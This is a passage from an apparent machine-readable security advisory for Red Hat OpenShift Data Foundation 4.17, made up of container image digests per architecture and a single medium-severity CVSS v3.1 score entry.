"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", 